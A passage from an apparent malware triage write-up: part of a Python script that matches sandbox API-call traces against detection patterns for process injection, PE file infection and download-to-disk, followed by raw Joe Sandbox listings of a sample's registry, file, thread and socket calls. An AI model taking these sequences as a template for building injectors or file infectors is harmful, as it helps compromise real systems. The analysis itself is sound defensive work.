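CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 022FF96C
InternetReadFile.WININET(?,?,00000400,?), ref: 022FF992
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 022FF9DA
FindCloseChangeNotification.KERNEL32(?), ref: 022FFA4A
InternetCloseHandle.WININET(?), ref: 022FFA60
InternetCloseHandle.WININET(?), ref: 022FFA76"""
# Constructed from the control-flow node labels of 02300D40 (injection) and 022FCAC1 with
# 022FF6C5 (file infection); the report prints no linear trace for them, so these are not report output.
INJECTION_TRACE = ["LookupPrivilegeValueA", "AdjustTokenPrivileges", "AdjustTokenPrivileges",
                   "FindCloseChangeNotification", "GetTokenInformation", "GetTokenInformation", "lstrcmpiA",
                   "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread", "FindCloseChangeNotification"]
INFECTION_TRACE = ["GetFileAttributesA", "SetFileAttributesA", "CreateFileA", "CreateFileMappingA", "MapViewOfFile",
                   "GetFileAttributesA", "MapViewOfFile", "CreateFileMappingA", "MapViewOfFile", "SetFilePointer",
                   "SetEndOfFile", "SetFileTime", "FindCloseChangeNotification", "SetFileAttributesA"]

# Ordered chains; each step is the set of acceptable names (ANSI/wide). A chain matches when
# its steps occur, in order, as a subsequence of the trace (other calls may sit in between).
PATTERNS: Dict[str, List[Tuple[str, ...]]] = {
    "dynamic_api_resolution": [("LoadLibraryA", "LoadLibraryW"), ("GetProcAddress",)],
    "single_instance_mutex": [("CreateMutexA", "CreateMutexW"), ("GetLastError",)],
    "wininet_download_to_disk": [("InternetOpenA", "InternetOpenW"), ("InternetOpenUrlA", "InternetOpenUrlW"),
                                 ("CreateFileA", "CreateFileW"), ("InternetReadFile",), ("WriteFile",)],
    "remote_thread_injection": [("VirtualAllocEx",), ("WriteProcessMemory",), ("CreateRemoteThread",)],
    "pe_file_infection": [("GetFileAttributesA", "GetFileAttributesW"), ("SetFileAttributesA", "SetFileAttributesW"),
                          ("CreateFileA", "CreateFileW"), ("CreateFileMappingA", "CreateFileMappingW"),
                          ("MapViewOfFile",), ("SetEndOfFile",), ("SetFileTime",)],
}
# 0-based argument index carrying the object name; hex words and "?" are placeholders, not names.
NAME_ARG = {"CreateMutexA": 2, "CreateFileMappingA": 5, "CreateEventA": 3, "CreateSemaphoreA": 3}
NOT_A_NAME = re.compile(r"^(-?[0-9A-Fa-f]{8}|\?)$")

def parse_api_lines(text: str) -> List[dict]:
    """Parse 'APIs' lines into dicts; non-matching lines (headings, hashes) are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m is None:
            continue
        args = m.group("args")
        calls.append({"api": m.group("api"), "module": m.group("mod"),
                      "args": [a.strip() for a in args.split(",")] if args else [],
                      "ref": int(m.group("ref"), 16), "subcall": m.group("sub") is not None})
    return calls

def api_names(calls: List[dict]) -> List[str]:
    return [c["api"] for c in calls]

def named_kernel_objects(calls: List[dict]) -> List[Tuple[str, str]]:
    """Mutex/section/event names the sample creates: host indicators for a triage sweep."""
    out = []
    for c in calls:
        pos = NAME_ARG.get(c["api"])
        if pos is not None and len(c["args"]) > pos and not NOT_A_NAME.match(c["args"][pos]):
            out.append((c["api"], c["args"][pos]))
    return out

def find_chain(trace: List[str], chain: List[Tuple[str, ...]]) -> Optional[List[int]]:
    """Leftmost ordered-subsequence match: trace indices of each step, or None."""
    hits: List[int] = []
    for i, api in enumerate(trace):
        if api in chain[len(hits)]:
            hits.append(i)
            if len(hits) == len(chain):
                return hits
    return None

def classify(trace: List[str]) -> Dict[str, List[int]]:
    """Every pattern the trace exhibits, with the indices that matched."""
    found = {name: find_chain(trace, chain) for name, chain in PATTERNS.items()}
    return {name: hits for name, hits in found.items() if hits is not None}
```

Matching is ordered-subsequence matching, so unrelated calls between steps do not break a chain, but a legitimate updater that opens a URL and writes a file will also hit wininet_download_to_disk; treat the result as triage scoring, and pair it with the named objects the listing supports (Ap1mutx7, l8geqpHJTkdns0, purity_control_90830), which are the specific indicators to sweep for on live hosts. The 000927C0 argument to the final Sleep is 600000 ms, a ten-minute stall before ExitProcess.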
                                  APIs
                                  • socket.WS2_32(00000002,00000002,00000000), ref: 022F3925
                                  • setsockopt.WS2_32(?,0000FFFF,00001002,00100000,00000004), ref: 022F3963
                                  • bind.WS2_32(?,00000002,00000010), ref: 022F3979
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: bindsetsockoptsocket
                                  • String ID:
                                  • API String ID: 3947658864-0
                                  • Opcode ID: 05a0dfd5ce68345f107cbe523542eec6c55c2854c72340c84678938593f721a0
                                  • Instruction ID: fdd97f840ddb64d4e32408b53753f50f7e55d7b91d7ffe2e261ca76091f5c89b
                                  • Opcode Fuzzy Hash: 05a0dfd5ce68345f107cbe523542eec6c55c2854c72340c84678938593f721a0
                                  • Instruction Fuzzy Hash: 61511BB4D503A8DBEB20CB55CD49BD9B7B8AF08701F0085E9E799A6284D7F40AC4CF24
                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,00000000), ref: 022FB928
                                  • FindNextFileA.KERNELBASE(000000FF,00000000), ref: 022FB94F
                                  • Sleep.KERNEL32(00000100), ref: 022FBA18
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: FileFind$FirstNextSleep
                                  • String ID:
                                  • API String ID: 2635277345-0
                                  • Opcode ID: 7c4d2136387a59b207afb2ead6dba3ad2881a810988d9194a89585c6dbdf7a59
                                  • Instruction ID: ca83228d5cf48f06ffb3b096bfe6a58aa02d0c3191484b560b56136eeaf99796
                                  • Opcode Fuzzy Hash: 7c4d2136387a59b207afb2ead6dba3ad2881a810988d9194a89585c6dbdf7a59
                                  • Instruction Fuzzy Hash: 3C5183B1D502289BDB64CBA0DC48BEFB77DAB48309F0049F8EA0DA6144DB749B95CF50

                                  Control-flow Graph

                                  APIs
                                  • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\NVIDIA Corporation\Installer,00000000,00000001,?), ref: 00403BAD
                                  • RegQueryValueExA.ADVAPI32 ref: 00403BE5
                                  • _memset.LIBCMT ref: 00403BF8
                                  • RegQueryValueExA.ADVAPI32(?,LogPath,00000000,00000000,?,?), ref: 00403C25
                                  • PathIsRelativeA.SHLWAPI(?), ref: 00403C30
                                  • RegCloseKey.ADVAPI32(?), ref: 00403C53
                                  • CreateMutexA.KERNEL32(00000000,00000000,Global\NVInstallerLogFile), ref: 00403C73
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403C89
                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000008,NVInstallerLogSharedMemory), ref: 00403C9C
                                  • ReleaseMutex.KERNEL32(?), ref: 00403CB1
                                  • CloseHandle.KERNEL32(?), ref: 00403CBE
                                  • GetLastError.KERNEL32 ref: 00403CE2
                                  • MapViewOfFile.KERNEL32(00000000,?,00000006,00000000,00000000,00000000), ref: 00403CFE
                                  • CloseHandle.KERNEL32(?), ref: 00403D19
                                  • ReleaseMutex.KERNEL32(?), ref: 00403D28
                                  • CloseHandle.KERNEL32(?), ref: 00403D35
                                  • GetFileAttributesA.KERNEL32(?), ref: 00403D65
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 00403D76
                                  • _sprintf.LIBCMT ref: 00403D8B
                                  • ReleaseMutex.KERNEL32(?,?,?,?,?,?), ref: 00403DC5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CloseMutex$CreateFileHandleRelease$QueryValue$AttributesDirectoryErrorLastMappingObjectOpenPathRelativeSingleViewWait_memset_sprintf
                                  • String ID: %s\NVInstaller.log$C:\Temp$Global\NVInstallerLogFile$LogPath$Logging$NVInstallerLogSharedMemory$SOFTWARE\NVIDIA Corporation\Installer
                                  • API String ID: 2627255047-2578820818
                                  • Opcode ID: 052d10b7ba0bcf3eb9074f92dd681132ef49649650334ca512f47e5b3b60c8f1
                                  • Instruction ID: e88f1dd91a3dfb04777037b14920d96b08079ed927c04f7df4dc91cae3044eae
                                  • Opcode Fuzzy Hash: 052d10b7ba0bcf3eb9074f92dd681132ef49649650334ca512f47e5b3b60c8f1
                                  • Instruction Fuzzy Hash: F551DEB1604305AFD324DF64ECC5AAB7BA8FB88305F40893EF555D3290E7788944CB9A

                                  Control-flow Graph

                                   • Graph image not reproduced; function entry block 2302847-2302906. API-bearing blocks: 2302847 (call 23078a0, call 2301d03, WinExec, LoadLibraryA), 2302952 (LoadLibraryA), 23029d1 (RegOpenKeyExA), 23029f5 (RegSetValueExA, RegCloseKey), 2302a2d (RegOpenKeyExA), 2302a51 (RegSetValueExA), 2302a89 (RegOpenKeyExA), 2302b19 (GetComputerNameA), 2302b94 (CreateFileMappingA, call 22f1320, call 22f1b6e), 2302bd4 (call 22fba5a), 2302d35 (CharLowerA, GlobalAlloc).
                                  APIs
                                    • Part of subcall function 02301D03: RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?,?), ref: 02301D4A
                                    • Part of subcall function 02301D03: RegSetValueExA.KERNELBASE(?,?,00000000,00000004,00000002,00000004), ref: 02301D78
                                    • Part of subcall function 02301D03: RegCloseKey.KERNEL32(?), ref: 02301D85
                                  • WinExec.KERNEL32(02317F84,00000000), ref: 023028E7
                                  • LoadLibraryA.KERNEL32(?), ref: 023028F3
                                  • LoadLibraryA.KERNEL32(?), ref: 02302959
                                  • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,00000000), ref: 023029EB
                                  • RegSetValueExA.KERNEL32(00000000,?,00000000,00000004,00000000,00000004), ref: 02302A1A
                                  • RegCloseKey.KERNEL32(00000000), ref: 02302A27
                                  • RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,00000000), ref: 02302A47
                                  • RegSetValueExA.KERNEL32(00000000,?,00000000,00000004,00000000,00000004), ref: 02302A76
                                  • RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,00000000), ref: 02302AA3
                                  • GetComputerNameA.KERNEL32(00000000,00000080), ref: 02302B31
                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,?), ref: 02302BA8
                                  • CharLowerA.USER32(c:\windows), ref: 02302D6E
                                  • GlobalAlloc.KERNEL32(00000040,00019000), ref: 02302D7B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Open$Value$CloseLibraryLoad$AllocCharComputerCreateExecFileGlobalLowerMappingName
                                  • String ID: C:\Windows\system32\drivers\ptqmrn.sys$c:\windows$h*U$n
                                  • API String ID: 4234863482-1818592721
                                  • Opcode ID: ce8bedf69c6d79cffff6174ab2bc76772418de1d260f3e5d88db73e89f412a54
                                  • Instruction ID: fa00c878bc34a6a06bd11f2452ddf3adb6a22183e248bc01ec38241349ebda88
                                  • Opcode Fuzzy Hash: ce8bedf69c6d79cffff6174ab2bc76772418de1d260f3e5d88db73e89f412a54
                                  • Instruction Fuzzy Hash: 66E1C5F1E80618AFD724CFA4DCA8FAB77B9FB08701F004599EB0996280D7745A95CF64

                                  Control-flow Graph

                                  APIs
                                  • SetErrorMode.KERNEL32(00008002), ref: 02302E18
                                    • Part of subcall function 02302847: WinExec.KERNEL32(02317F84,00000000), ref: 023028E7
                                    • Part of subcall function 02302847: LoadLibraryA.KERNEL32(?), ref: 023028F3
                                    • Part of subcall function 02302847: LoadLibraryA.KERNEL32(?), ref: 02302959
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001161B,00000000,00000000,00000000), ref: 02302E46
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000B3F5,00000000,00000000,00000000), ref: 02302E67
                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 02302E6E
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00012633,00000000,00000000,00000000), ref: 02302E88
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00003F98,00000000,00000000,00000000), ref: 02302EA9
                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 02302EB0
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000B81A,00000000,00000000,00000000), ref: 02302ECA
                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 02302ED1
                                    • Part of subcall function 02303090: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,?,?,?,022F21E7), ref: 023030C7
                                    • Part of subcall function 02303090: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00008000,?,022F21E7), ref: 023030EE
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00003846,00000000,00000000,00000000,00000001), ref: 02303028
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00003D56,00000000,00000000,00000000), ref: 02303049
                                  • Sleep.KERNEL32(00000200), ref: 02303064
                                    • Part of subcall function 022FBD79: MapViewOfFile.KERNEL32(00000280,00000006,00000000,00000000,00015400,?,00000000), ref: 022FBDD7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Create$Thread$ChangeCloseFileFindNotification$LibraryLoadView$ErrorExecMappingModeSleep
                                  • String ID:
                                  • API String ID: 1062100891-0
                                  • Opcode ID: 74b7a0e2e285d37b40128357bfdb052976bf1f6c4eb6326a8020fdd028bc9068
                                  • Instruction ID: f154d55d4253f40a071c409fb9af36d9e97cd3dada34d0e28aef6165673083df
                                  • Opcode Fuzzy Hash: 74b7a0e2e285d37b40128357bfdb052976bf1f6c4eb6326a8020fdd028bc9068
                                  • Instruction Fuzzy Hash: D1615170A84368ABFB64DB50CC59FDAB778AF04B01F1045E4FB0A661D0DBB02A84CF65

                                  Control-flow Graph

                                   • Graph image not reproduced; function entry block 22ffea5-22fff66. API-bearing blocks: 22ffea5 (CreateFileA), 22fff84 (GlobalAlloc, ReadFile), 22fffbd and 2300028 (call 22f10e5, call 22f11be), 230006c (SetFilePointer, WriteFile, SetFilePointer, SetEndOfFile, FindCloseChangeNotification), 23000f3 (DeleteFileA).
                                  APIs
                                  • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?), ref: 022FFF53
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 022FFF90
                                  • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 022FFFB1
                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 02300079
                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02300097
                                  • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 023000AC
                                  • SetEndOfFile.KERNEL32(?), ref: 023000B9
                                  • FindCloseChangeNotification.KERNEL32(?), ref: 023000C6
                                  • DeleteFileA.KERNEL32(?), ref: 023000F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: File$Pointer$AllocChangeCloseCreateDeleteFindGlobalNotificationReadWrite
                                  • String ID: D
                                  • API String ID: 4141462786-2746444292
                                  • Opcode ID: 0df20139784f773de0242d9eb8725906afbc42f215a0c3a4c378b6aba2f0f360
                                  • Instruction ID: 2374ad935ac1ca0110dfefed8334fd84d9536875fb05659859ae728d54486b71
                                  • Opcode Fuzzy Hash: 0df20139784f773de0242d9eb8725906afbc42f215a0c3a4c378b6aba2f0f360
                                  • Instruction Fuzzy Hash: ADB162B1D44218EFDB24DFA4DC9CBEEB779EB48310F108698E609A7280C7759A85CF50

                                  Control-flow Graph

                                   • Graph image not reproduced; function entry block 2302633-230266d (call 23078a0). API-bearing blocks: 2302677 (Sleep), 2302684 (LoadLibraryA), 23026b3 (GetProcAddress), 2302728 (CreateThread * 2), 23027a4 (Sleep, CreateThread, FindCloseChangeNotification), 23027cc (call 2300640 * 2), 230280c (call 22f1000, call 2300992).
                                  APIs
                                  • Sleep.KERNEL32(00000400), ref: 0230267C
                                    • Part of subcall function 02300992: WNetOpenEnumA.MPR(00000002,00000000,00000000,02308028,00000000), ref: 02300A02
                                  • LoadLibraryA.KERNEL32(00000000), ref: 0230269E
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 023026C0
                                  • CreateThread.KERNEL32(00000000,00000000,02301E7C,00000000,00000000,00000000), ref: 0230273C
                                  • CreateThread.KERNEL32(00000000,00000000,02300D09,00000000,00000000,00000000), ref: 0230275D
                                  • Sleep.KERNEL32(00000400), ref: 02302795
                                  • CreateThread.KERNEL32(00000000,00000000,02300B90,0000005A,00000000,00000000), ref: 023027BD
                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 023027C4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CreateThread$Sleep$AddressChangeCloseEnumFindLibraryLoadNotificationOpenProc
                                  • String ID: Z
                                  • API String ID: 3340677522-1505515367
                                  • Opcode ID: 24d34da96f2fd3571734e1635218910057c272550c80287b9e8bb9eac50ef5bf
                                  • Instruction ID: 325d7cd75e87de65d8ae58ff11be97a2a7066b02bf91ac3d6af854c97b2fe4fa
                                  • Opcode Fuzzy Hash: 24d34da96f2fd3571734e1635218910057c272550c80287b9e8bb9eac50ef5bf
                                  • Instruction Fuzzy Hash: D6518CB5D80264ABE725DB60DC98FDA7778BB08706F0049A9FB4AA61C0D7B019D4CF24

                                  Control-flow Graph

                                   • Graph image not reproduced; function entry block 2301e7c-2301fac (call 23078a0, call 22f12c4, Sleep, call 22fbc61, call 22f621e). API-bearing blocks: 2301fb2 (CreateFileA), 2301fdd (FindCloseChangeNotification), 230200c (CopyFileA), 230202a (call 22fcac1), 230209c (call 2301d03), 2302205 (call 22f1000), 2302260 (call 22fa201), 2302425 (call 22fb69a, call 22f12c4), 23024c1 (call 22f12c4), 23024fe (call 23019d5), 23025fd (RtlExitUserThread).
                                  APIs
                                  • Sleep.KERNEL32 ref: 02301F86
                                    • Part of subcall function 022F621E: GetFileAttributesA.KERNEL32(?), ref: 022F635B
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 02301FC8
                                  • FindCloseChangeNotification.KERNEL32(000000FF), ref: 02302006
                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 0230201C
                                  • RtlExitUserThread.NTDLL(00000000), ref: 02302618
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: File$AttributesChangeCloseCopyCreateExitFindNotificationSleepThreadUser
                                  • String ID: :$\
                                  • API String ID: 1445743944-1166558509
                                  • Opcode ID: 4aca2f93c926d20e5e9d0242b1f4d1d08f2c2cde66ed81bd3da2e3113ddb5457
                                  • Instruction ID: 3cc8c8bcf95fc12bad2fed43673279ec4622f3c82fbc965ed131e021edf4b058
                                  • Opcode Fuzzy Hash: 4aca2f93c926d20e5e9d0242b1f4d1d08f2c2cde66ed81bd3da2e3113ddb5457
                                  • Instruction Fuzzy Hash: 41127EB1D402689BDB24DB64CC98BEFB779EB48300F0046D9EA49E61C4D7749AE5CF60

                                  Control-flow Graph

                                   • Graph image not reproduced; function entry block 2303930-23039dd. API-bearing blocks: 23039f0 (GetUserNameA, call 2306e8b, RegOpenKeyExA), 2303ad8 (RegEnumValueA), 2303c5e (RegSetValueExA), 2303d27 (RegQueryValueExA), 2303e67 (RegCloseKey).
                                  APIs
                                  • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02303A10
                                  • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 02303A75
                                  • RegEnumValueA.KERNEL32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 02303AFC
                                  • RegCloseKey.KERNEL32(00000000), ref: 02303E6E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CloseEnumNameOpenUserValue
                                  • String ID:
                                  • API String ID: 3905208545-0
                                  • Opcode ID: 20076b4d6a53cef0b019f1eaaac5c8d5b97231b29ef777b0fe6466089122db23
                                  • Instruction ID: 8a018a4cfaae16c2331b2d77bbec84928b2d7794d570c671034d1e5ddf2177c0
                                  • Opcode Fuzzy Hash: 20076b4d6a53cef0b019f1eaaac5c8d5b97231b29ef777b0fe6466089122db23
                                  • Instruction Fuzzy Hash: BCD1B5B1911229DBDB24DF54CC98BEAB7B9FB48704F1086D9E50DA6280D7749BC4CF60

                                  Control-flow Graph

                                   • Graph image not reproduced; function entry block 231f470-231f480. API-bearing blocks: 231f5a2 (LoadLibraryA), 231f5cb (GetProcAddress), 231f5e1 (ExitProcess), 231f618 (VirtualProtect * 2).
                                  APIs
                                  • LoadLibraryA.KERNEL32(?), ref: 0231F5B2
                                  • GetProcAddress.KERNEL32(?,0231CFF9), ref: 0231F5D0
                                  • ExitProcess.KERNEL32(?,0231CFF9), ref: 0231F5E1
                                  • VirtualProtect.KERNEL32(022F0000,00001000,00000004,?,00000000), ref: 0231F62F
                                  • VirtualProtect.KERNEL32(022F0000,00001000), ref: 0231F644
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                  • String ID:
                                  • API String ID: 1996367037-0
                                  • Opcode ID: d47d7ccd0b0b7a30d8738312ef8ef38fbd8f659606bd1d5221914103b37143c7
                                  • Instruction ID: f3e62b889314576f387dd41647ef7b7992ee1bb5d4d4a5bb531e26c0806284b7
                                  • Opcode Fuzzy Hash: d47d7ccd0b0b7a30d8738312ef8ef38fbd8f659606bd1d5221914103b37143c7
                                  • Instruction Fuzzy Hash: 6651F4B2A547524BD7388EB89CC07B0B7A4EB452747180739C6E6C7BC6EBA49806C764

                                  Control-flow Graph

                                  • Rendered control-flow graph for function 22fa364 omitted; its nodes call RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegEnumKeyExA and RegDeleteKeyA, with a recursive call back into 22fa364.
                                  APIs
                                  • RegOpenKeyExA.KERNEL32(?,?,00000000,000F003F,?), ref: 022FA380
                                  • RegEnumValueA.KERNEL32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 022FA3B7
                                  • RegDeleteValueA.KERNEL32(?,?), ref: 022FA3D3
                                  • RegEnumKeyExA.KERNEL32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 022FA40B
                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 022FA457
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: DeleteEnumValue$Open
                                  • String ID:
                                  • API String ID: 3197069048-0
                                  • Opcode ID: 3673b100d541d8c9a6441b3a9c05cddce5830f8ff9fa559975ebdd27b85f6053
                                  • Instruction ID: 0b8828643d7f631c65b468c71f7329c7c7a08718da6e77c85ae6538155387022
                                  • Opcode Fuzzy Hash: 3673b100d541d8c9a6441b3a9c05cddce5830f8ff9fa559975ebdd27b85f6053
                                  • Instruction Fuzzy Hash: 0231E9F9950208FBDB14CBD4DC84FDEB7B8AB08704F108699FB09A7184D774A649CBA4

                                  Control-flow Graph

                                  • Rendered control-flow graph for function 22f2e87 omitted; its nodes call socket, sendto and select, plus several internal subroutines.
                                  APIs
                                  • socket.WS2_32(00000002,00000002,00000011), ref: 022F2EEF
                                  • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 022F2F59
                                  • select.WS2_32(?,00000000,00000000,00000000,00000014), ref: 022F3031
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: selectsendtosocket
                                  • String ID: @
                                  • API String ID: 4221616969-2766056989
                                  • Opcode ID: 81a8634c60651eedac85f59b8cc1f7bd7230ad688c56961af9f819b68b6537db
                                  • Instruction ID: 0ba7944673f8c0227c6cd358fd06942acdb0bf6ba1d3db4f981cca0e248d6a75
                                  • Opcode Fuzzy Hash: 81a8634c60651eedac85f59b8cc1f7bd7230ad688c56961af9f819b68b6537db
                                  • Instruction Fuzzy Hash: 7E81CE70D252A88AEB38CB64CC64BEAB775AF45350F4042E9E79DA61C4C7B05EC4CF50
                                  APIs
                                  • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?,?), ref: 02301D4A
                                  • RegSetValueExA.KERNELBASE(?,?,00000000,00000004,00000002,00000004), ref: 02301D78
                                  • RegCloseKey.KERNEL32(?), ref: 02301D85
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CloseOpenValue
                                  • String ID: >
                                  • API String ID: 779948276-325317158
                                  • Opcode ID: 7c4b8463a133e1f0a885a21549b9f04efd0bc303e6cd64a6b8dabc594336f025
                                  • Instruction ID: 7bbf00f2e2a42c394af1702b13c1e58a1db9989066c36c32b77e866bc4af6b82
